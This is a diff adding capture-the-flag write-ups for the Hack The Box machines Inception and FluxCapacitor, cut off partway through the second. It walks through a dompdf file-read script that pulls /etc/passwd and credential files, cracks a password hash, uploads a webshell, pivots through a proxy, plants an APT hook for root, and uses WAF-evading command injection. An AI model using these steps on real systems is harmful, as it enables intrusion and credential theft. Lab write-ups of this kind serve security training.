IsLCw6L3J1bi9zeXN0ZW1kL3Jlc29sdmU6L2Jpbi9mYWxzZQpzeXN0ZW1kLWJ1cy1wcm94eTp4OjEwMzoxMDU6c3lzdGVtZCBCdXMgUHJveHksLCw6L3J1bi9zeXN0ZW1kOi9iaW4vZmFsc2UKc3lzbG9nOng6MTA0OjEwODo6L2hvbWUvc3lzbG9nOi9iaW4vZmFsc2UKX2FwdDp4OjEwNTo2NTUzNDo6L25vbmV4aXN0ZW50Oi9iaW4vZmFsc2UKc3NoZDp4OjEwNjo2NTUzNDo6L3Zhci9ydW4vc3NoZDovdXNyL3NiaW4vbm9sb2dpbgpjb2JiOng6MTAwMDoxMDAwOjovaG9tZS9jb2JiOi9iaW4vYmFzaAo=)] TJ ET
+ endstream
+ endobj
+ 8 0 obj
+ << /Type /Font
+ /Subtype /Type1
+ /Name /F1
+ /BaseFont /Times-Roman
+ /Encoding /WinAnsiEncoding
+ >>
+ endobj
+ xref
+ 0 9
+ 0000000000 65535 f
+ 0000000008 00000 n
+ 0000000073 00000 n
+ 0000000119 00000 n
+ 0000000273 00000 n
+ 0000000302 00000 n
+ 0000000416 00000 n
+ 0000000479 00000 n
+ 0000002425 00000 n
+ trailer
+ <<
+ /Size 9
+ /Root 1 0 R
+ /Info 5 0 R
+ >>
+ startxref
+ 2535
+ %%EOF
+
+
+
+Decoding the base64 string using **echo 'b64string' | base64 -d** we get the contents of /etc/passwd:
+
+
+ root:x:0:0:root:/root:/bin/bash
+ daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
+ bin:x:2:2:bin:/bin:/usr/sbin/nologin
+ sys:x:3:3:sys:/dev:/usr/sbin/nologin
+ sync:x:4:65534:sync:/bin:/bin/sync
+ games:x:5:60:games:/usr/games:/usr/sbin/nologin
+ man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
+ lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
+ mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
+ news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
+ uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
+ proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
+ www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
+ backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
+ list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
+ irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
+ gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
+ nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
+ systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
+ systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
+ systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
+ systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
+ syslog:x:104:108::/home/syslog:/bin/false
+ _apt:x:105:65534::/nonexistent:/bin/false
+ sshd:x:106:65534::/var/run/sshd:/usr/sbin/nologin
+ cobb:x:1000:1000::/home/cobb:/bin/bash
+
+
+As you can see, this can be long and tedious to trim the excessive amount of data to then decode a b64 string. so we'll use [absolobomb's](https://www.absolomb.com/2018-04-14-HackTheBox-Inception/) python script to speed it up :
+
+
+ #!/usr/bin/env python3
+ import base64
+ import urllib.request
+ import argparse
+
+ parser = argparse.ArgumentParser()
+ parser.add_argument("file")
+ args = parser.parse_args()
+
+
+ url = 'http://10.10.10.67/dompdf/dompdf.php?input_file=php://filter/read=convert.base64-encode/resource='
+
+ try:
+ req = urllib.request.urlopen(url + args.file)
+
+ output = req.read()
+
+ if output:
+ string = output.decode()
+ result = string[string.find("[(")+2:string.find(")]")]
+ decoded = base64.b64decode(result).decode('utf8')
+ print(decoded)
+
+ except urllib.error.HTTPError:
+ print("File cannot be downloaded")
+
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Inception]
+ → nano absolobomb_rocks.py
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Inception]
+ → chmod +x absolobomb_rocks.py
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Inception]
+ → ./absolobomb_rocks.py /etc/passwd
+ root:x:0:0:root:/root:/bin/bash
+ daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
+ bin:x:2:2:bin:/bin:/usr/sbin/nologin
+ sys:x:3:3:sys:/dev:/usr/sbin/nologin
+ sync:x:4:65534:sync:/bin:/bin/sync
+ games:x:5:60:games:/usr/games:/usr/sbin/nologin
+ man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
+ lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
+ mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
+ news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
+ uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
+ proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
+ www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
+ backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
+ list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
+ irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
+ gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
+ nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
+ systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
+ systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
+ systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
+ systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
+ syslog:x:104:108::/home/syslog:/bin/false
+ _apt:x:105:65534::/nonexistent:/bin/false
+ sshd:x:106:65534::/var/run/sshd:/usr/sbin/nologin
+ cobb:x:1000:1000::/home/cobb:/bin/bash
+
+
+
+Since we are on an apache2 website, let's try and print out it's default configuration:
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Inception]
+ → ./absolobomb_rocks.py /etc/apache2/sites-enabled/000-default.conf
+ <****VirtualHost *:80>
+ # The ServerName directive sets the request scheme, hostname and port that
+ # the server uses to identify itself. This is used when creating
+ # redirection URLs. In the context of virtual hosts, the ServerName
+ # specifies what hostname must appear in the request's Host: header to
+ # match this virtual host. For the default virtual host (this file) this
+ # value is not decisive as it is used as a last resort host regardless.
+ # However, you must set it for any further virtual host explicitly.
+ #ServerName www.example.com
+
+ ServerAdmin webmaster@localhost
+ DocumentRoot /var/www/html
+
+ # Available loglevels: trace8, ..., trace1, debug, info, notice, warn,
+ # error, crit, alert, emerg.
+ # It is also possible to configure the loglevel for particular
+ # modules, e.g.
+ #LogLevel info ssl:warn
+
+ ErrorLog ${APACHE_LOG_DIR}/error.log
+ CustomLog ${APACHE_LOG_DIR}/access.log combined
+
+ # For most configuration files from conf-available/, which are
+ # enabled or disabled at a global level, it is possible to
+ # include a line for only one particular virtual host. For example the
+ # following line enables the CGI configuration for this host only
+ # after it has been globally disabled with "a2disconf".
+ #Include conf-available/serve-cgi-bin.conf
+ Alias /webdav_test_inception /var/www/html/webdav_test_inception <****Location /webdav_test_inception>
+ Options FollowSymLinks
+ DAV On
+ AuthType Basic
+ AuthName "webdav test credential"
+ AuthUserFile /var/www/html/webdav_test_inception/webdav.passwd
+ Require valid-user <****/Location> <****/VirtualHost>
+
+ # vim: syntax=apache ts=4 sw=4 sts=4 sr noet
+
+From this configuration file we see a path to the webdav directory, so let's go and grab the passwd file :
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Inception]
+ → ./absolobomb_rocks.py /var/www/html/webdav_test_inception/webdav.passwd
+ webdav_tester:$apr1$8rO7Smi4$yqn7H.GvJFtsTou1a7VME0
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Inception]
+ → hash-identifier
+ #########################################################################
+ # __ __ __ ______ _____ #
+ # /\ \/\ \ /\ \ /\__ _\ /\ _ `\ #
+ # \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ #
+ # \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ #
+ # \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ #
+ # \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ #
+ # \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.2 #
+ # By Zion3R #
+ # www.Blackploit.com #
+ # Root@Blackploit.com #
+ #########################################################################
+ --------------------------------------------------
+ HASH: $apr1$8rO7Smi4$yqn7H.GvJFtsTou1a7VME0
+
+ Possible Hashs:
+ [+] MD5(APR)
+
+
+According to Hash-Identifier the hash we found is MD5.
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Inception]
+ → ./absolobomb_rocks.py /var/www/html/webdav_test_inception/webdav.passwd > inception.txt
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Inception]
+ → hashcat -m 1600 -a 0 inception.txt /usr/share/wordlists/rockyou.txt
+ hashcat (v5.1.0) starting...
+
+ Dictionary cache hit:
+ * Filename..: .\rockyou.txt
+ * Passwords.: 14343296
+ * Bytes.....: 139921497
+ * Keyspace..: 14343296
+
+ $apr1$8rO7Smi4$yqn7H.GvJFtsTou1a7VME0:babygurl69
+
+
+And using rockyou.txt we found the password **babygurl69**. For this next part we will upload [phpbash](https://github.com/Arrexel/phpbash) which is a semi-interactive webshell made by [Arrexel](https://app.hackthebox.eu/profile/2904) which we already encountered on a previous box named [Bashed](https://blog.nowhere.moe/htb/easy/15). We will upload it using the credentials we found with cadaver :
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Inception]
+ → cadaver http://10.10.10.67/webdav_test_inception/
+ Authentication required for webdav test credential on server `10.10.10.67':
+ Username: webdav_tester
+ Password:
+ dav:/webdav_test_inception/> put phpbash.php
+ Uploading phpbash.php to `/webdav_test_inception/phpbash.php':
+ Progress: [=============================>] 100.0% of 11251 bytes succeeded.
+ dav:/webdav_test_inception/>
+
+
+So we browse to our phpbash shell at _http://10.10.10.67/webdav_test_inception/phpbash.php_
+
+
+
+
+ www-data@Inception
+ :/var/www/html/webdav_test_inception# ls
+
+ phpbash.php
+ webdav.passwd
+ www-data@Inception
+ :/var/www/html/webdav_test_inception# cd ..
+
+ www-data@Inception
+ :/var/www/html# ls
+
+ LICENSE.txt
+ README.txt
+ assets
+ dompdf
+ images
+ index.html
+ latest.tar.gz
+ webdav_test_inception
+ wordpress_4.8.3
+ www-data@Inception
+ :/var/www/html# cd wordpress_4.8.3
+
+ www-data@Inception
+ :/var/www/html/wordpress_4.8.3# ls
+
+ phpbash.php
+ webdav.passwd
+
+
+we are logged in as www-data so let's see if we can print out user.txt :
+
+
+ www-data@Inception
+ :/var/www/html/wordpress_4.8.3# id
+
+ uid=33(www-data) gid=33(www-data) groups=33(www-data)
+ www-data@Inception
+ :/var/www/html/wordpress_4.8.3# cd /home
+
+ www-data@Inception
+ :/home# ls
+
+ cobb
+ www-data@Inception
+ :/home# cd cobb
+
+ www-data@Inception
+ :/home/cobb# ls
+
+ user.txt
+ www-data@Inception
+ :/home/cobb# cat user.txt
+
+ cat: user.txt: Permission denied
+
+
+And we get permission denied so we need to find a way to privesc to the cobb user. Looking into /var/www/html/wordpress_4.8.3 we print out the contents of wp-config.php :
+
+
+ www-data@Inception:/var/www/html/wordpress_4.8.3# cat wp-config.php
+
+ /**
+ * The base configuration for WordPress
+ *
+ * The wp-config.php creation script uses this file during the
+ * installation. You don't have to use the web site, you can
+ * copy this file to "wp-config.php" and fill in the values.
+ *
+ * This file contains the following configurations:
+ *
+ * * MySQL settings
+ * * Secret keys
+ * * Database table prefix
+ * * ABSPATH
+ *
+ * @link https://codex.wordpress.org/Editing_wp-config.php
+ *
+ * @package WordPress
+ */
+
+ // ** MySQL settings - You can get this info from your web host ** //
+ /** The name of the database for WordPress */
+ define('DB_NAME', 'wordpress');
+
+ /** MySQL database username */
+ define('DB_USER', 'root');
+
+ /** MySQL database password */
+ define('DB_PASSWORD', 'VwPddNh7xMZyDQoByQL4');
+
+ /** MySQL hostname */
+ define('DB_HOST', 'localhost');
+
+
+
+And we have credentials : root:VwPddNh7xMZyDQoByQL4 although we can't connect to ssh on the box yet. We already know that the squid proxy allows us to pass traffic through it, so we can try to enumerate the box THROUGH the proxy to see if ssh is open. so we'll use the **squid_pivot_scanning** metasploit module.
+
+
+ msf5 > use auxiliary/scanner/http/squid_pivot_scanning
+
+ msf5 auxiliary(scanner/http/squid_pivot_scanning) > set RPORT 3128
+ RPORT => 3128
+
+ msf5 auxiliary(scanner/http/squid_pivot_scanning) > set RHOSTS 10.10.10.67
+ RHOSTS => 10.10.10.67
+
+ msf5 auxiliary(scanner/http/squid_pivot_scanning) > set RANGE 127.0.0.1
+ RANGE => 127.0.0.1
+
+ msf5 auxiliary(scanner/http/squid_pivot_scanning) > set PORTS 21,80,139,443,445,1433,1521,1723,3389,8080,9100,22
+ PORTS => 21,80,139,443,445,1433,1521,1723,3389,8080,9100,22
+
+ msf5 auxiliary(scanner/http/squid_pivot_scanning) > run
+
+
+Looking at the results :
+
+
+ [+] [10.10.10.67] 127.0.0.1 is alive but 21 is CLOSED
+ [+] [10.10.10.67] 127.0.0.1:22 seems OPEN
+ [+] [10.10.10.67] 127.0.0.1:80 seems OPEN
+ [+] [10.10.10.67] 127.0.0.1 is alive but 139 is CLOSED
+ [+] [10.10.10.67] 127.0.0.1 is alive but 445 is CLOSED
+ [+] [10.10.10.67] 127.0.0.1 is alive but 1433 is CLOSED
+ [+] [10.10.10.67] 127.0.0.1 is alive but 1521 is CLOSED
+ [+] [10.10.10.67] 127.0.0.1 is alive but 1723 is CLOSED
+ [+] [10.10.10.67] 127.0.0.1 is alive but 3389 is CLOSED
+ [+] [10.10.10.67] 127.0.0.1 is alive but 8080 is CLOSED
+ [+] [10.10.10.67] 127.0.0.1 is alive but 9100 is CLOSED
+ [*] Scanned 1 of 1 hosts (100% complete)
+ [*] Auxiliary module execution completed
+
+
+SSH seems to be opened through the proxy, But to get ourselves to access it we need to use corkscrew and edit our local /etc/ssh/ssh_config to add a ProxyCommand.
+
+
+ λ root [ 10.10.14.11/23 ] [nihilist/_HTB/Inception]
+ → echo 'ProxyCommand corkscrew 10.10.10.67 3128 %h %p' >> /etc/ssh/ssh_config
+
+ λ root [ 10.10.14.11/23 ] [nihilist/_HTB/Inception]
+ → ssh cobb@127.0.0.1
+ The authenticity of host '127.0.0.1 ()' can't be established.
+ ECDSA key fingerprint is SHA256:dr5DOURssJH5i8VbjPxvbeM+e2FyMqJ8DGPB/Lcv1Mw.
+ Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
+ Warning: Permanently added '127.0.0.1' (ECDSA) to the list of known hosts.
+ cobb@127.0.0.1's password:
+ Welcome to Ubuntu 16.04.3 LTS (GNU/Linux 4.4.0-101-generic x86_64)
+
+ * Documentation: https://help.ubuntu.com
+ * Management: https://landscape.canonical.com
+ * Support: https://ubuntu.com/advantage
+ Last login: Thu Nov 30 20:06:16 2017 from 127.0.0.1
+
+ cobb@Inception:~$ id
+ uid=1000(cobb) gid=1000(cobb) groups=1000(cobb),27(sudo)
+
+ cobb@Inception:~$ cat user.txt
+ 4aXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+
+And that's it ! we have been able to print out the user flag.
+
+## **Part 3 : Getting Root Access**
+
+In order to gain root privileges on the box it is very straightforward, but that's not an easy box as you can see :
+
+
+ cobb@Inception:~$ sudo -l
+ [sudo] password for cobb:
+ Matching Defaults entries for cobb on Inception:
+ env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
+
+ User cobb may run the following commands on Inception:
+ (ALL : ALL) ALL
+
+
+Running sudo -l we see that we are able to run /bin/bash as sudo to privesc immediately, so let's do it :
+
+
+ cobb@Inception:~$ sudo bash
+ root@Inception:~# id
+ uid=0(root) gid=0(root) groups=0(root)
+ root@Inception:~# cat /root/root.txt
+ You're waiting for a train. A train that will take you far away. Wake up to find root.txt.
+
+
+And we became root ! But our root flag isn't there , so let's check out which ports are opened from within the box :
+
+
+ root@Inception:~# netstat -ant
+ Active Internet connections (servers and established)
+ Proto Recv-Q Send-Q Local Address Foreign Address State
+ tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN
+ tcp 0 0 127.0.0.1:22 127.0.0.1:48514 ESTABLISHED
+ tcp 0 0 127.0.0.1:48514 127.0.0.1:22 ESTABLISHED
+ tcp6 0 0 :::80 :::* LISTEN
+ tcp6 0 0 :::22 :::* LISTEN
+ tcp6 0 0 :::3128 :::* LISTEN
+ tcp6 0 556 192.168.0.10:3128 192.168.0.1:59898 ESTABLISHED
+
+ root@Inception:~# which nc
+ /bin/nc
+
+ root@Inception:~# nc -zv 192.168.0.1 1-65535 2>&1 | grep -v "refused"
+ Connection to 192.168.0.1 21 port [tcp/ftp] succeeded!
+ Connection to 192.168.0.1 22 port [tcp/ssh] succeeded!
+ Connection to 192.168.0.1 53 port [tcp/domain] succeeded!
+
+
+Looking at the output of the netstat command we see that we have another local ip address to work with : **192.168.0.1** So we use the netcat binary on the machine to scan it's opened ports and we find the ftp port opened , checking it out :
+
+
+ root@Inception:~# ftp 192.168.0.1
+ Connected to 192.168.0.1.
+ 220 (vsFTPd 3.0.3)
+ Name (192.168.0.1:cobb): anonymous
+ 331 Please specify the password.
+ Password:
+ 230 Login successful.
+ Remote system type is UNIX.
+ Using binary mode to transfer files.
+ ftp> ls
+ 200 PORT command successful. Consider using PASV.
+ 150 Here comes the directory listing.
+ drwxr-xr-x 2 0 0 4096 Nov 30 2017 bin
+ drwxr-xr-x 3 0 0 4096 Nov 30 2017 boot
+ drwxr-xr-x 19 0 0 3920 Mar 08 06:47 dev
+ drwxr-xr-x 93 0 0 4096 Nov 30 2017 etc
+ drwxr-xr-x 2 0 0 4096 Nov 06 2017 home
+ lrwxrwxrwx 1 0 0 33 Nov 30 2017 initrd.img -> boot/initrd.img-4.4.0-101-generic
+ lrwxrwxrwx 1 0 0 32 Nov 06 2017 initrd.img.old -> boot/initrd.img-4.4.0-98-generic
+ drwxr-xr-x 22 0 0 4096 Nov 30 2017 lib
+ drwxr-xr-x 2 0 0 4096 Oct 30 2017 lib64
+ drwx------ 2 0 0 16384 Oct 30 2017 lost+found
+ drwxr-xr-x 3 0 0 4096 Oct 30 2017 media
+ drwxr-xr-x 2 0 0 4096 Aug 01 2017 mnt
+ drwxr-xr-x 2 0 0 4096 Aug 01 2017 opt
+ dr-xr-xr-x 205 0 0 0 Mar 08 06:47 proc
+ drwx------ 6 0 0 4096 Nov 08 2017 root
+ drwxr-xr-x 26 0 0 920 Mar 08 06:47 run
+ drwxr-xr-x 2 0 0 12288 Nov 30 2017 sbin
+ drwxr-xr-x 2 0 0 4096 Apr 29 2017 snap
+ drwxr-xr-x 3 0 0 4096 Nov 06 2017 srv
+ dr-xr-xr-x 13 0 0 0 Mar 08 06:47 sys
+ drwxrwxrwt 10 0 0 4096 Mar 08 08:30 tmp
+ drwxr-xr-x 10 0 0 4096 Oct 30 2017 usr
+ drwxr-xr-x 13 0 0 4096 Oct 30 2017 var
+ lrwxrwxrwx 1 0 0 30 Nov 30 2017 vmlinuz -> boot/vmlinuz-4.4.0-101-generic
+ lrwxrwxrwx 1 0 0 29 Nov 06 2017 vmlinuz.old -> boot/vmlinuz-4.4.0-98-generic
+
+
+Once logged in as anonymous , we find the crontab file :
+
+
+ ftp> cd /etc
+ 250 Directory successfully changed.
+
+ ftp> get crontab
+ local: crontab remote: crontab
+ 200 PORT command successful. Consider using PASV.
+ 150 Opening BINARY mode data connection for crontab (826 bytes).
+ 226 Transfer complete.
+ 826 bytes received in 0.00 secs (4.3046 MB/s)
+
+
+
+
+So we copy 192.168.0.1's crontab file into 10.10.10.67, to examine it :
+
+
+ ftp> exit
+ 221 Goodbye.
+ root@Inception:~# cat crontab
+ # /etc/crontab: system-wide crontab
+ # Unlike any other crontab you don't have to run the `crontab'
+ # command to install the new version when you edit this file
+ # and files in /etc/cron.d. These files also have username fields,
+ # that none of the other crontabs do.
+
+ SHELL=/bin/sh
+ PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
+
+ # m h dom mon dow user command
+ 17 * * * * root cd / && run-parts --report /etc/cron.hourly
+ 25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
+ 47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
+ 52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
+ */5 * * * * root apt update 2>&1 >/var/log/apt/custom.log
+ 30 23 * * * root apt upgrade -y 2>&1 >/dev/null
+
+
+Looking at what we have here, we see that every 5 minutes apt update is running. What's important here is that we are able to run commands everytime apt-update runs by placing our file inside /etc/apt/apt.conf.d/
+
+
+ root@Inception:~# ssh-keygen
+ Generating public/private rsa key pair.
+ Enter file in which to save the key (/root/.ssh/id_rsa):
+ Created directory '/root/.ssh'.
+ Enter passphrase (empty for no passphrase):
+ Enter same passphrase again:
+ Your identification has been saved in /root/.ssh/id_rsa.
+ Your public key has been saved in /root/.ssh/id_rsa.pub.
+ The key fingerprint is:
+ SHA256:Qm6bKYD4Jeq/STACtAJFV4D/PdwvPV6owjoUtFA5uT8 root@Inception
+ The key's randomart image is:
+ +---[RSA 2048]----+
+ |.+o.o+oo |
+ |o o.. = |
+ |o. . o.+ |
+ |+. .o+ |
+ |+oo ..+=S. |
+ |.oo+ .o=E . . |
+ |. ....+. o o. . |
+ |. . ... o ..+. |
+ | ..+. .o ..o.. |
+ +----[SHA256]-----+
+
+
+
+So first we generate a ssh key inside 10.10.10.67 to then put it into 192.168.0.1's /root/.ssh/authorized_keys
+
+
+ root@Inception:~# ftp 192.168.0.1
+ Connected to 192.168.0.1.
+ 220 (vsFTPd 3.0.3)
+ Name (192.168.0.1:cobb): anonymous
+ 331 Please specify the password.
+ Password:
+ 230 Login successful.
+ Remote system type is UNIX.
+ Using binary mode to transfer files.
+ ftp> put /root/.ssh/id_rsa.pub /root/.ssh/authorized_keys
+ local: /root/.ssh/id_rsa.pub remote: /root/.ssh/authorized_keys
+ 200 PORT command successful. Consider using PASV.
+ 550 Permission denied.
+ ftp> exit
+ 221 Goodbye.
+
+
+Didn't work, that's because we need to use tftp instead of ftp:
+
+
+ root@Inception:~# tftp 192.168.0.1
+ tftp> put /root/.ssh/id_rsa.pub /root/.ssh/authorized_keys
+ Sent 397 bytes in 0.0 seconds
+ tftp> exit
+ ?Invalid command
+ tftp> quit
+
+
+Now that's done we need to get 192.168.0.1 to change our ssh public key with the correct permissions, we'll get this done by getting APT to execute our command as we planned earlier :
+
+
+
+ root@Inception:~# echo 'APT::Update::Pre-Invoke {"chmod 600 /root/.ssh/authorized_keys"};' > 00command
+ root@Inception:~# tftp 192.168.0.1
+ tftp> put 00command /etc/apt/apt.conf.d/00command
+ Sent 67 bytes in 0.0 seconds
+ tftp> quit
+
+
+
+once that's done we wait 5 minutes and then ssh in as the root user :
+
+
+ root@Inception:~# ssh root@192.168.0.1
+ Welcome to Ubuntu 16.04.3 LTS (GNU/Linux 4.4.0-101-generic x86_64)
+
+ * Documentation: https://help.ubuntu.com
+ * Management: https://landscape.canonical.com
+ * Support: https://ubuntu.com/advantage
+
+ 0 packages can be updated.
+ 0 updates are security updates.
+
+
+ Last login: Thu Nov 30 20:04:21 2017
+ root@Inception:~# cat /root/root.txt
+ 8dXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+And that's it ! we have been able to print out the root flag.
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
diff --git a/Medium/17.md b/Medium/17.md
new file mode 100644
index 0000000..b1ddb5d
--- /dev/null
+++ b/Medium/17.md
@@ -0,0 +1,287 @@
+# FluxCapacitor Writeup
+
+
+
+## Introduction :
+
+FluxCapacitor is a Medium linux box released back in December 2017
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/FluxCapacitor]
+ → nmap -F --top-ports 10000 10.10.10.69 -vvv
+ Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-09 05:59 GMT
+ Initiating Ping Scan at 05:59
+ Scanning 10.10.10.69 [2 ports]
+ Completed Ping Scan at 05:59, 0.33s elapsed (1 total hosts)
+ Initiating Parallel DNS resolution of 1 host. at 05:59
+ Completed Parallel DNS resolution of 1 host. at 05:59, 0.08s elapsed
+ DNS resolution of 1 IPs took 0.09s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
+ Initiating Connect Scan at 05:59
+ Scanning 10.10.10.69 [8320 ports]
+ Discovered open port 80/tcp on 10.10.10.69
+ Increasing send delay for 10.10.10.69 from 0 to 5 due to 70 out of 231 dropped probes since last increase.
+ Increasing send delay for 10.10.10.69 from 5 to 10 due to max_successful_tryno increase to 4
+ Connect Scan Timing: About 25.10% done; ETC: 06:01 (0:01:32 remaining)
+ Connect Scan Timing: About 55.44% done; ETC: 06:01 (0:00:49 remaining)
+ Completed Connect Scan at 06:01, 107.71s elapsed (8320 total ports)
+ Nmap scan report for 10.10.10.69
+ Host is up, received syn-ack (0.12s latency).
+ Scanned at 2020-03-09 05:59:15 GMT for 108s
+ Not shown: 8318 closed ports
+ Reason: 8318 conn-refused
+ PORT STATE SERVICE REASON
+ 80/tcp open http syn-ack
+ 5355/tcp filtered llmnr no-response
+
+ λ nihilist [ 10.10.14.11/23 ] [~]
+ → nmap -sCV -p80,5355 10.10.10.69
+ Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-09 06:01 GMT
+ Nmap scan report for 10.10.10.69
+ Host is up (0.26s latency).
+
+ PORT STATE SERVICE VERSION
+ 80/tcp open http SuperWAF
+ |_http-server-header: SuperWAF
+ |_http-title: Keep Alive
+ 5355/tcp filtered llmnr
+ 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 34.10 seconds
+
+
+
+## **Part 2 : Getting User Access**
+
+Our nmap scan picked up port 80 so let's dirsearch it :
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/FluxCapacitor]
+ → dirsearch -u http://10.10.10.69/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50 -e txt,php,html,xml
+
+ git clone https://github.com/maurosoria/dirsearch.git
+ dirsearch -u -e -t 50 -x 500
+
+ _|. _ _ _ _ _ _|_ v0.3.9
+ (_||| _) (/_(_|| (_| )
+
+ Extensions: txt, php, html, xml | HTTP method: get | Threads: 50 | Wordlist size: 220521
+
+ Error Log: /home/nihilist/Desktop/Tools/dirsearch/logs/errors-20-03-09_06-05-49.log
+
+ Target: http://10.10.10.69/
+
+ [06:05:50] Starting:
+ [06:05:51] 200 - 395B - /
+ [06:07:02] 403 - 577B - /sync
+ [06:09:49] 403 - 577B - /synctoy
+ [06:10:26] 403 - 577B - /synching
+ [06:10:34] 403 - 577B - /sync_scan
+ [06:11:12] 403 - 577B - /syncbackse
+ [06:14:01] 403 - 577B - /synch
+
+
+
+` 
+
+Looks like a very simple webpage, but when we look at it's sourcecode we are hinted towards a /sync directory. (which our dirsearch command found aswell)
+
+ 
+
+looks like we get a 403 forbidden error although we now know about a service running on the box and it's version. Hopefully for us it is vulnerable to RCE by abusing the user-agent and the opt parameter, but we need to escape some characters :
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~]
+ → curl "http://10.10.10.69/sync?opt=' /usr/bin/which mknod'"
+ 403
+
+ λ nihilist [ 10.10.14.11/23 ] [~]
+ → curl "http://10.10.10.69/sync?opt=' /usr/bin/whi[c]h mknod'"
+ 403
+
+ λ nihilist [ 10.10.14.11/23 ] [~]
+ → curl "http://10.10.10.69/sync?opt=' /usr/bin/whi[c]h mk\nod'"
+ /bin/mknod
+ bash: -c: option requires an argument
+
+
+
+Now that we verified we could get RCE on the machine, let's get into the important parts :
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/FluxCapacitor]
+ → curl "http://10.10.10.69/sync?opt=' c\at /usr/local/ope\nresty/nginx/conf/nginx.conf'" > nginx.conf
+ % Total % Received % Xferd Average Speed Time Time Time Current
+ Dload Upload Total Spent Left Speed
+ 100 3896 0 3896 0 0 9938 0 --:--:-- --:--:-- --:--:-- 9938
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/FluxCapacitor]
+ → curl "http://10.10.10.69/sync?opt=' c\at /usr/local/ope\nresty/nginx/conf/unixcmd.txt'" > unixcmd.txt
+ % Total % Received % Xferd Average Speed Time Time Time Current
+ Dload Upload Total Spent Left Speed
+ 100 10822 0 10822 0 0 25167 0 --:--:-- --:--:-- --:--:-- 25109
+
+
+
+Now that we have the nginx config and the unixcmd textfiles we can enumerate the box further looking into nginx.conf :
+
+
+ SecRuleEngine On
